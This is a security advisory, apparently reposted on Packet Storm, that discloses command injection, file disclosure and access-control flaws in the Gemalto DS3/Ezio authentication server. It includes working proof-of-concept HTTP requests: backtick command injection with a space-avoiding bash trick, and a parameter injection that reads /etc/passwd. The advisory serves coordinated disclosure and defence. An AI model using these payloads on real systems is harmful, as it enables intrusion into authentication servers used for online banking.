what you don't know can hurt you

Gemalto DS3 Authentication Server / Ezio Server Command Injection / File Disclosure

Gemalto DS3 Authentication Server / Ezio Server Command Injection / File Disclosure
Posted May 9, 2019
Authored by TING Meng Yean | Site sec-consult.com

Gemalto (Thales Group) DS3 Authentication Server and Ezio Server versions prior to 3.1.0 suffer from semi-blind OS command injection, local file disclosure, and broken access controls that when combined allows a low-privileged application user to upload a JSP web shell with the access rights of the lower privileged Linux system user "asadmin".

tags | exploit, web, shell, local
systems | linux
advisories | CVE-2019-9156, CVE-2019-9157, CVE-2019-9158
MD5 | 946053c73c9d490355a31158aefe4e4e

Gemalto DS3 Authentication Server / Ezio Server Command Injection / File Disclosure

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20190509-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Gemalto (Thales Group) DS3 Authentication Server / Ezio
Server
vulnerable version: Ezio DS3 server <v3.1.0
fixed version: Ezio DS3 server v3.1.0
CVE number: CVE-2019-9156, CVE-2019-9157, CVE-2019-9158
impact: Medium
homepage: https://www.gemalto.com
found: 2019-02-11
by: TING Meng Yean (Office Singapore)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
DS3 Authentication Server is an appliance that provides authentication and
end-to-end encryption for online banking and remote transactions.
DS3 has been acquired by Gemalto, and the Authentication Server is now known
as the Gemalto Ezio Server. Gemalto is now part of the Thales Group.

Source: http://www.fisid.ch/products/ds3-main-products.html
Source: https://www.gemalto.com/financial/ebanking/ezio-server
Source:
https://www.thalesgroup.com/en/group/journalist/press-release/thales-completes-acquisition-gemalto-become-global-leader-digital


Business recommendation:
------------------------
The vendor provides a patch and users of this product are urged to
upgrade to the latest version available.

An in-depth security analysis performed by security professionals is
highly advised, as the software may be affected from further security
issues.


Vulnerability overview/description:
-----------------------------------
The DS3 Authentication Server is prone to several security issues as described
below that when combined, allows a low-privileged application user to upload a
JSP web shell with the access rights of the lower privileged Linux system
user "asadmin".

The CVSSv3 scores have been provided by the vendor.


1) Semi-Blind OS Command Injection (Post-authenticated)
- CVE-2019-9156
- CWE-78
- CVSSv3: 6.8 (Medium)

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L
The DS3 Authentication Server provides several administration tools to perform
connectivity checks. "TestTelnetConnection.jsp" does not correctly validate the
user input for the "HOST_NAME" and "PORT_NUMBER" parameters, allowing an
attacker to execute arbitrary commands on the server side with the privileges
of the local system user "asadmin".

2) Limited Local File Disclosure (LFD) (Post-authenticated)
- CVE-2019-9157
- CWE-538
- CVSSv3: 5.7 (Medium)

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
The DS3 Authentication Server provides several administration tools to check the
system's access and error logs. "TailLogs.jsp" does not correctly validate the
user input for the "LOG_TYPE" parameter, allowing an attacker to read arbitrary
local files with the privileges of the local system user "asadmin".

3) Broken Access Control (Post-authenticated)
- CVE-2019-9158
- CWE-284
- CVSSv3: 5.7 (Medium)

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
The DS3 Authentication Server provides several permission groups, granting different
levels of privileges, from the administrative "dsssAdmin" group to the low
privileged "READ_ONLY" group. A user with the "dsssAdmin" group can see more
functions in the menu of the web portal than a user with the "READ_ONLY" group.
However, the user with the "READ_ONLY" group can access some "dsssAdmin"
functions by replaying the POST or GET request directly.


Proof of concept:
-----------------
1) Semi-Blind OS Command Injection (Post-authenticated) (CVE-2019-9156)

This POC was performed using a user with the "READ_ONLY" group permission.

This exploit also has the following two restrictions:
1) The bash commands injected cannot contain any space (' '/%20).
2) The output of the bash commands injected must be null or cannot contain any
space (' '/%20). However, the tester was able to create complex bash commands
payload without any space (' '/%20) by using a bash trick.

The simple OS command payload "whoami" injected into the "HOST_NAME"
parameter and the HTTP response with the result of the payload
"asadmin" mixed in. Please note that the OS command payload is enclosed
with the `` characters.

########################################################################
POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1
Host: $IP
Cookie: JSESSIONID=<jsessionid_cookie>
Content-Type: application/x-www-form-urlencoded
Content-Length: 132

CSRFTOKEN=<csrf_token>&HOST_NAME=127.0.0.1`whoami`&PORT_NUMBER=8443&TEST_RESULTS=%0D%0A%09%09%09%09%09%09
########################################################################
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=utf-8
Server: DS3-AuthServer
Content-Length: 12987

...
<TEXTAREA ROWS="10" COLS="80" READONLY NAME="TEST_RESULTS">
Start time : ... SGT 2019
End time : ... SGT 2019
Time taken (ms): 3
Attempting connection to 127.0.0.1`whoami` on port 8443
...
127.0.0.1asadmin/8443: Temporary failure in name resolution
Error connecting to 127.0.0.1`whoami` on port 8443
Successful connection to 127.0.0.1`whoami` on port 8443
</TEXTAREA>
</TD>
...
########################################################################


The complex bash command payload without any space (' '/%20) representing
"ls -1 | tail -1" injected into the "PORT_NUMBER" parameter and the HTTP
response with the result of the payload "liquibase.out" mixed in. Please note
that the OS command payload is enclosed with the `` characters.
########################################################################
POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1
Host: $IP
Cookie: JSESSIONID=<jsessionid_cookie>
Content-Type: application/x-www-form-urlencoded
Content-Length: 173

CSRFTOKEN=<csrf_token>&HOST_NAME=127.0.0.1&PORT_NUMBER=8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`&TEST_RESULTS=%0D%0A%09%09%09%09%09%09
########################################################################
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=utf-8
Server: DS3-AuthServer
Content-Length: 13159

...
<TEXTAREA ROWS="10" COLS="80" READONLY NAME="TEST_RESULTS">
Start time : ... SGT 2019
End time : ... SGT 2019
Time taken (ms): 8
Attempting connection to 127.0.0.1 on port
8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`
127.0.0.1/8443liquibase.out: Servname not supported for ai_socktype
Error connecting to 127.0.0.1 on port
8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`
Successful connection to 127.0.0.1 on port
8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`
</TEXTAREA>
</TD>
...
########################################################################


2) Limited Local File Disclosure (LFD) (Post-authenticated) (CVE-2019-9157)

This POC was performed using an admin user with the "dsssAdmin" group
permission, as the "ADMINISTRATION -> Log Manager -> View Log -> Tail Logs
Utility" function is not accessible to users with the "READ_ONLY" group
permission.

This exploit has the following two restrictions:
1) Only the last 10 lines of the file are displayed.
2) Directory traversal was not allowed, as the parameter cannot contain two
dot (.) characters.

However, the tester was able to bypass the directory traversal restriction by
injecting the arbitrary filename as another argument, rather than to modify
the first argument.

The file "/etc/passwd" injected into the "LOG_TYPE" parameter and the response
with the last 10 lines of the file returned. Please note that the injected
filename is preceded with the + character.
########################################################################
GET
/ServerAdmin/TailLogs.jsp?LOG_TYPE=+/etc/passwd&KEYWORD_FILTER=&REFRESH_RATE=5&TAIL_LINE=0&CSRFTOKEN=<csrf_token>
HTTP/1.1
Host: $IP
Cookie: JSESSIONID=<jsessionid_cookie>

########################################################################
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=utf-8
Content-Length: 3702
Server: DS3-AuthServer

...
<TR Border=0 Align="LEFT">
<TD COLSPAN=2>
<TEXTAREA READONLY ROWS="20" COLS="80" NAME="TAIL_LOGS">
==> /home/data/log/ <== ==> /etc/passwd <==
ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System message
bus:/:/sbin/nologin sshd:x:74:74:Privilege-separated
SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
mysql:x:501:501::/home/mysql:/sbin/nologin
asadmin:x:502:502::/home/asadmin:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
hacluster:x:498:503::/var/lib/heartbeat/cores/hacluster:/sbin/nologin
haproxy:x:503:504::/home/haproxy:/sbin/nologin
</TEXTAREA>
</TD>
...
########################################################################


3) Broken Access Control (Post-authenticated) (CVE-2019-9158)

The admin user with the "dsssAdmin" group permission is able to access the
following chain of functions in the menu of the web portal.
* ADMINISTRATION -> Log Manager -> View Log
* ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility

The user with the "READ_ONLY" group permission is not able to access the
following chain of function in the menu of the web portal.
* ADMINISTRATION -> Log Manager -> View Log

Based on the web portal, a user with the "READ_ONLY" group permission should
also not be able to access the following chain of function.
* ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility

However, it was noted that a user with the "READ_ONLY" group permission is able
to access the "Tail Logs Utility" function with the GET request (captured from
the "dsssAdmin" user's request) directly with the "READ_ONLY" user's session
cookie and CSRFTOKEN token.

https://$IP/ServerAdmin/TailLogs.jsp?LOG_TYPE=audit.log&KEYWORD_FILTER=&REFRESH_RATE=5&TAIL_LINE=392154&CSRFTOKEN=<csrf_token>

********************************************************************************


Vulnerable / tested versions:
-----------------------------
The following version has been tested and found to be vulnerable:
* 2.6.1-SP01

The following version was confirmed to be vulnerable by the vendor:
* All versions earlier than v3.1.0


Vendor contact timeline:
------------------------
2019-02-27: Contacting vendor through csirt@gemalto.com (Gemalto CERT)
2019-03-08: Gemalto CERT confirmed the vulnerabilities for DS3/Ezio Server
version 2.8.0-update01 and earlier. Requested 2 months disclosure
embargo period to implement fix for future release.
2019-03-22: Gemalto CERT confirmed the fix for the reported vulnerabilities to
be included in current sprint and provided CVSSv3 scoring and CWE
assigned.
2019-03-22: Provided Gemalto CERT with attacker-centric CVSSv3 metrics.
2019-04-05: Gemalto CERT provided updated CVSSv3 metrics.
2019-04-18: Gemalto CERT informed that the fix for the 3 vulnerabilities
was planned in the upcoming of Ezio DS3 server v3.1.0 release
by 1st week of May, and asked for extension of embargo period.
Furthermore, Gemalto is now part of the Thales Group.
2019-05-06: Patches available
2019-05-09: Coordinated release of security advisory


Solution:
---------
According to the vendor the patches are provided to the Support Team L2 and
Professional Services team and those teams will get in touch with the technical
contacts of the customers. The update will also be announced via a future newsletter.

Furthermore, SEC Consult have been informed that the branch 2.x of Ezio DS3
server is not fixed yet and a patch will be available at a later date.
However, customers are reminded about deployment guidelines to reduce their attack
surface.


Workaround:
-----------
As the vulnerabilities need authentication with valid credentials to the portal,
it is recommended to deploy the application in a trusted zone and should be
restricted to the customer's internal secure network.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF TING Meng Yean / @2019

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    11 Files
  • 21
    May 21st
    21 Files
  • 22
    May 22nd
    20 Files
  • 23
    May 23rd
    36 Files
  • 24
    May 24th
    2 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close